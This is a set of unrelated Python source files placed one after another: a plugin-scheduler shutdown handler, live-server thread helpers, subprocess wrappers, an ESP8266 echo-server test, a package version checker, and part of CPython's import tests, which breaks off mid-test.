* The Plugin Scheduler thread is not alive: this can happen if we have not been able to acquire the lock or
the if the Plugin Scheduler thread quits unexpectedly. In this case, this handler proceeds to call the function
to shutdown other services (e.g. Celery Beat Service)
In case a lock has not yet been acquired, then it also cancels the pending lock acquisition request
In case it receives a SIGHUP, it calls startup_plugin_scheduler. This would re-create the PanoptesContext -
essentially, re-reading the configuration
Args:
signal_number (int): The received signal number
_ (frame): Current stack frame object
Returns:
None
"""
# If the Plugin Scheduler is already in the process of shutdown, then do nothing - prevents issues
# with re-entrancy
if self._shutdown_plugin_scheduler.is_set():
print('%s Plugin Scheduler already in the process of shutdown, ignoring %s' %
(self._plugin_type_display_name, const.SIGNALS_TO_NAMES_DICT[signal_number]))
return
print('Caught %s, shutting down %s Plugin Scheduler' % (
const.SIGNALS_TO_NAMES_DICT[signal_number], self._plugin_type_display_name))
shutdown_interval = int(int(self._config[self._plugin_type]['plugin_scan_interval']) * 2)
print('Shutdown/restart may take up to %s seconds' % shutdown_interval)
print('Signalling for %s Plugin Scheduler Task Thread to shutdown' % self._plugin_type_display_name)
self._shutdown_plugin_scheduler.set()
if (self._t is not None) and (self._t.isAlive()):
self._t.join()
if (self._t is None) or (not self._t.isAlive()):
print('%s Plugin Scheduler Task Thread is not active - shutting down other services' %
self._plugin_type_display_name)
if self._plugin_scheduler_celery_beat_service:
print('Shutting down Celery Beat Service')
self._plugin_scheduler_celery_beat_service.stop()
if self._lock:
print('Releasing lock')
self._lock.release()
print('%s Plugin Scheduler shutdown complete')
sys.exit()
|
runner.py
|
import threading
import multiprocessing
import uuid
import logging
import requests
import flask
import time
from typing import Callable
from zig import Zig
logger = logging.getLogger(__name__)
class ServerThread:
# common interface that can be used by Thread or Process
# without coupling Thread/Process library to code
def __init__(self):
pass
def start(self):
raise NotImplementedError
def run(self):
super().run()
def close(self):
raise NotImplementedError
def is_alive(self):
raise NotImplementedError
def join(self):
raise NotImplementedError
class ServerOperations:
# Operation object that can be instantiate and run by thread/process
# NOTE: QUESTIONS
# Should this be inherited or use as an object(bridge)?
# Inherit: share the same state, don't need to pass variables around
# Inherit: can change inheritance in the future too
# Object: decouple, can swap in another implementation in the future
def __init__(self):
self.app = None
self.stop_route = "/_stop-{}".format(uuid.uuid4().hex)
@staticmethod
def _stop_server():
#TODO: should be container agnostic
stopper = flask.request.environ.get("werkzeug.server.shutdown")
stopper()
return "Flask Server is shutting down"
def prepare_app(self, app):
container = self.app.container.app_instance
self.app.container.add_url_route(container,
self.stop_route,
self.stop_route,
self._stop_server
)
self.host = self.app.container_config.host
self.port = self.app.container_config.port
#TODO: need to add container-specific method to get index
if self.port:
self.index_url = "".join(["http://", self.host, ":", str(self.port)])
else:
self.index_url = "".join(["http://", self.host])
def run(self):
if not self.app: raise ValueError("Need to pass zig app to thread")
try:
self.prepare_app(self.app)
except:
raise Exception("Failure to prepare app")
# runs Flask/Django server
try:
self.app.run()
except:
# close thread if exception
raise
finally:
logger.info("Server thread is running")
#wait_for(requests.get(self.index_url), 1000)
def close(self):
#TODO container agnostic method
#TODO need to get host and port from app
stop_url = "".join([self.index_url, self.stop_route])
if self.is_alive():
try:
requests.get(stop_url)
except:
raise Exception("Cannot reach stop url, or server wasn't started")
class LiveServerThread(ServerThread, ServerOperations):
""" Uses Flask/Django Server to run tests
it should be agnostics
"""
def __init__(self):
# set app later
self.thread = threading.Thread(target=self.run)
ServerOperations.__init__(self)
def start(self):
self.thread.start()
def is_alive(self):
return self.thread.is_alive()
def join(self):
self.thread.join()
def close(self):
ServerOperations.close(self)
class LiveServerProcess(ServerThread, ServerOperations):
def __init__(self):
self.process = multiprocessing.Process(target=self.run)
def start(self):
self.process.start()
def close(self):
if self.is_alive():
try:
self.process.close()
except ValueError:
logging.debug("process wass still running. It will be forced killed")
self.process.kill()
def is_alive(self):
self.process.is_alive()
def join(self):
self.process.join()
def run(self):
ServerOperations.run(self)
def wait_for(condition: Callable, time_out, expected_output=True, poll=0.1):
res = condition()
end_time = time.time() + time_out
while res != expected_output:
if time.time() > end_time:
raise Exception("timeout")
time.sleep(poll)
# try again
res=condition()
return res
"""
class ThreadController(object):
# Able to plug in any type of server
def __init__(self, app):
self.app = app
self.server_thread = None
def __call__(self, *args, **kwarg):
self.start_thread(*args, **kwarg)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
return
def start_thread(self, app: Zig, thread_class: ServerThread=None):
thread_class = thread_class if thread_class else LiveFlaskServerThread
self.server_thread = thread_class(app)
try:
self.server_thread.start()
except RuntimeError:
raise
self.started = self.server_thread.is_alive()
return self.server_thread
def thread(app):
self.server_thread = LiveFlaskServerThread(app)
try:
self.server_thread.start()
except RuntimeError:
raise
self.started = self.thread.is_alive()
"""
|
cmd_process.py
|
import fcntl
import inspect
import os
import re
import subprocess
from threading import Thread
from time import sleep
from waiting import wait, TimeoutExpired
class CmdProcess:
"""
Lightweight wrapper over subprocess.Popen.
Should be used where interaction with stdin and callbacks on
events are not required.
"""
def __init__(self, cmd, log_path):
self._cmd = cmd
self._log_path = log_path
self._log_file = None
self._proc = None
self._return_code = None
self._cb_on_finish = []
@property
def return_code(self):
if self._proc is None: # in case if process has not been started yet
return self._return_code
if self._return_code is None:
self._return_code = self._proc.poll()
return self._return_code
def add_callback_on_finish(self, cb):
self._cb_on_finish.append(cb)
def _run(self):
with open(self._log_path, 'ab', buffering=0) as log_file:
log_file.write(f'Run: {self._cmd}\n'.encode('utf-8'))
self._proc = subprocess.Popen(self._cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=log_file,
stderr=log_file)
while self.return_code is None:
sleep(1)
log_file.write(f'EXIT CODE: {self.return_code}\n'.encode('utf-8'))
for cb in self._cb_on_finish:
cb()
def run(self):
t = Thread(target=self._run, daemon=True)
t.start()
def kill(self):
self._proc.kill()
class CmdProcessInteractive:
def __init__(self, cmd, env_vars=None, logger=None, print_output=False):
self.cmd = cmd
custom_env_vars = os.environ.copy()
if env_vars:
custom_env_vars.update(env_vars)
self.env_vars = custom_env_vars
self.pid = None
self.proc = None
self.output = [] # list with lines from stdout
self.errors = [] # list with lines from stderr
self.stdout_offset = 0 # previous lines will be ignored in search
self._return_code = None
self._killed = False # whether running process was stopped by .kill()
self._logger = logger
self._print_output = print_output
# callbacks
self.on_events = {}
self.on_finish = []
@property
def return_code(self):
if self.proc is None: # in case if process has not been started yet
return self._return_code
if self._return_code is None:
self._return_code = self.proc.poll()
return self._return_code
def run(self):
if self._logger:
self._logger.debug('Run: %s' % self.cmd)
self.proc = subprocess.Popen(self.cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=self.env_vars
)
self.pid = self.proc.pid
# Enable non-blocking read (Unix only!)
fcntl.fcntl(self.proc.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
fcntl.fcntl(self.proc.stderr.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
# Process output
out_iterator = _OutputIterator(self.proc.stdout)
err_iterator = _OutputIterator(self.proc.stderr)
self._process_output(out_iterator, err_iterator)
if self._logger:
self._logger.debug('EXIT CODE: %s' % self.return_code)
# Process callbacks on finish
for cb in self.on_finish:
cb()
def _process_output(self, out_iter, err_iter):
while not all([self.return_code is not None, out_iter.is_empty, err_iter.is_empty]):
# stop further processing if process has been terminated from code
if self._killed:
break
out_line, err_line = next(out_iter), next(err_iter)
if not out_line and not err_line:
sleep(0.01)
continue
if out_line:
self._process_line(out_line)
if err_line:
self._process_line(err_line, from_std_err=True)
else:
# do final check for missed output
try:
out_line = wait(lambda: next(out_iter), timeout_seconds=0.05)
self._process_line(out_line)
except TimeoutExpired:
out_line = None
try:
err_line = wait(lambda: next(err_iter), timeout_seconds=0.05)
self._process_line(err_line, from_std_err=True)
except TimeoutExpired:
err_line = None
# If unprocessed output was observed - run processing again
if out_line or err_line:
self._process_output(out_iter, err_iter)
def run_in_thread(self):
worker = Thread(target=self.run, daemon=True)
worker.start()
def send_to_stdin(self, input_):
"""
:param input_: string or bytes
"""
# Send input
self.update_stdout_offset()
if isinstance(input_, str):
input_ = bytes(input_, 'ascii')
input_ += b'\n'
self.proc.stdin.write(input_)
self.proc.stdin.flush()
# Log
msg = 'sent to stdin: %s' % str(input_)
if self._logger:
self._logger.info(msg)
if self._print_output:
print(msg)
def kill(self):
# if process is still running - send `SIGKILL` signal
if self._return_code is None:
if self._logger:
self._logger.info('KILLED (SIGKILL)')
self._killed = True
self.proc.kill()
def terminate(self):
# if process is still running - send `SIGTERM` status
if self._return_code is None:
if self._logger:
self._logger.info('TERMINATED (SIGTERM)')
self.proc.terminate()
def update_stdout_offset(self, offset=None):
"""
Set offset to current output length
"""
if offset is not None:
self.stdout_offset = offset
self.stdout_offset = len(self.output)
def wait_for_output(self, text, timeout_seconds=10, regex=False, **kwargs):
"""
:return: line with text or raises TimeoutExpired exception
"""
seen = self.stdout_offset
def finder():
nonlocal seen
for line in self.output[seen:]:
if regex:
match = re.search(text, line)
else:
match = text in line
if match:
return line
seen += 1
return ''
waiting_for = 'Text "%s" is present inside output of "%s" cmd' % (text, self.cmd)
return wait(
lambda: self.output and finder(), timeout_seconds, waiting_for=waiting_for, sleep_seconds=0.01, **kwargs
)
def register_callback_on_event(self, callback, log_event):
"""
Register function, which will be called on specified log event
"""
self.on_events[log_event] = callback
def register_callback_on_finish(self, callback):
self.on_finish.append(callback)
def _process_line(self, line, from_std_err=False):
if self._print_output:
print(line)
if self._logger:
if from_std_err:
self._logger.error(line)
else:
self._logger.debug(line)
if from_std_err:
self.errors.append(line)
else:
self.output.append(line)
# Process callbacks
for event, callback in self.on_events.items():
if event in line:
if inspect.getfullargspec(callback).args:
callback(line)
else:
callback()
class _OutputIterator:
"""
Simple iterator over non-blocking std object
"""
def __init__(self, std):
self._std = std
self.is_empty = False
def __iter__(self):
return self
def __next__(self):
line = self._std.readline()
line = line.decode('utf-8')
if line:
self.is_empty = False
else:
self.is_empty = True
return line.strip()
|
test_WiFiServer.py
|
from mock_decorators import setup, teardown
from threading import Thread
import socket
import time
stop_client_thread = False
client_thread = None
@setup('Simple echo server')
def setup_echo_server(e):
global stop_client_thread
global client_thread
def echo_client_thread():
server_address = socket.gethostbyname('esp8266-wfs-test.local')
count = 0
while count < 5 and not stop_client_thread:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server_address, 5000))
sock.settimeout(1.0)
buf = 'a' * 1023 + '\n'
sock.sendall(buf)
data = ''
retries = 0
while len(data) < 1024 and retries < 3:
data += sock.recv(1024)
retries += 1
print('Received {} bytes'.format(len(data)))
if len(data) != 1024:
raise RuntimeError('client failed to receive response')
count += 1
stop_client_thread = False
client_thread = Thread(target=echo_client_thread)
client_thread.start()
@teardown('Simple echo server')
def teardown_echo_server(e):
global stop_client_thread
stop_client_thread = True
client_thread.join()
|
__version__.py
|
# pylint: disable=C0415,C0413
__version__ = '0.0.15'
def check_version():
def _check_version():
import re
from distutils.version import LooseVersion as V
import httpx
try:
resp = httpx.get(
'https://mirrors.aliyun.com/pypi/simple/botoy/', timeout=10
)
resp.raise_for_status()
except Exception:
pass
else:
versions = re.findall(r'botoy-(.*?)\.tar\.gz', resp.text)
if versions:
versions = set(versions)
local_v = V(__version__)
latest_version = max(V(v) for v in versions)
if local_v < latest_version:
info = f'\033[33m==== 当前版本为: \033[31m{local_v}\033[33m, 已有最新版本: \033[31m{latest_version}\033[33m, 请及时更新! ====\033[0m'
print(info)
from threading import Thread
t = Thread(target=_check_version)
t.setDaemon(True)
t.start()
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
